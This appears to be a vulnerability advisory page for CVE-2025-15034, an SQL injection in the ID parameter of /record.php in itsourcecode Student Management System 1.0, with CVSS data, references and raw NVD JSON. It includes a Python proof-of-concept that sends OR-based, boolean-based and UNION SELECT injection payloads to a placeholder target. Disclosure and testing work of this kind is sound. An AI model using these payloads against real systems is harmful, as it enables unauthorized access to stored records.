CVE-2025-15034

Description

A security flaw has been discovered in itsourcecode Student Management System 1.0. This affects an unknown part of the file /record.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:student_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Student Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15034 SQL Injection PoC for itsourcecode Student Management System 1.0
# Target: record.php endpoint with vulnerable ID parameter

TARGET_URL = "http://target-server/record.php"

def sql_injection_test():
    # Basic SQL injection test payload
    payload = "1' OR '1'='1"
    params = {"ID": payload}
    
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        print(f"Status Code: {response.status_code}")
        print(f"Response Length: {len(response.text)}")
        
        # Check for SQL error indicators
        if "sql" in response.text.lower() or "error" in response.text.lower():
            print("[+] Potential SQL injection vulnerability detected!")
        else:
            print("[-] No obvious SQL injection indicators found")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

def extract_database_info():
    # Boolean-based blind SQL injection to extract database version
    # This payload tests if the database is MySQL
    payload_true = "1' AND 1=1 -- -"
    payload_false = "1' AND 1=2 -- -"
    
    # Union-based injection for data extraction
    union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -"
    
    print(f"Testing union-based injection: {union_payload}")
    params = {"ID": union_payload}
    
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Payload executed - verify response for data extraction")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-15034 SQL Injection PoC")
    print("Target: itsourcecode Student Management System 1.0")
    sql_injection_test()
    extract_database_info()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15034
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15034
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15034/
[4] VulDB https://vuldb.com/cve/CVE-2025-15034
[5] https://github.com/ltranquility/CVE/issues/29
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.337747
[8] https://vuldb.com/?id.337747
[9] https://vuldb.com/?submit.720615

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15034", "sourceIdentifier": "[email protected]", "published": "2025-12-23T01:15:41.873", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in itsourcecode Student Management System 1.0. This affects an unknown part of the file /record.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:student_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7816C1E9-D65F-4652-A2F5-27FDEAA6B33D"}]}]}], "references": [{"url": "https://github.com/ltranquility/CVE/issues/29", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.337747", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337747", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.720615", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}